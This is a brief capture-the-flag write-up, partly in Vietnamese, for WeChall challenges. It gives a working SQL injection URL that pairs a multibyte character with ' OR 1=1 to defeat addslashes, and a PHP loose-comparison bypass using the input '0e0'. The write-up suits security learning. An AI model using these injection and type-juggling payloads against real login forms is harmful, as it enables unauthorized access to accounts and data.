[wechall] Addslashes

http://www.wechall.net/challenge/addslashes/index.php?username=#' OR 1=1 limit 1,1-- -&password=123&login=#

(kí tự # là kí tự chữ trung quốc)

Advertisements

Advanced Mission 1

PHP Sucks

Bypass PHP checks:

<?php
     $input = trim(getUserInput());
     if(
           str_split($input) == array(0,0,0,0) ||
           strcmp($input, "0000") == 0 ||
           strcmp($input, "000") == 0 ||
           strcmp($input, "00") == 0 ||
           strcmp($input, "0") == 0 ||
           $input === 0 ||
           preg_match("/^[\d]{1,}$/D", $input)
     )fail_advanced_1();

     if($input == "0000") complete_advanced_1();
?>

By using == compare, PHP will not check type of variables. So pass this challenge by submit 0e0 because 0e0 = 0000 (haha)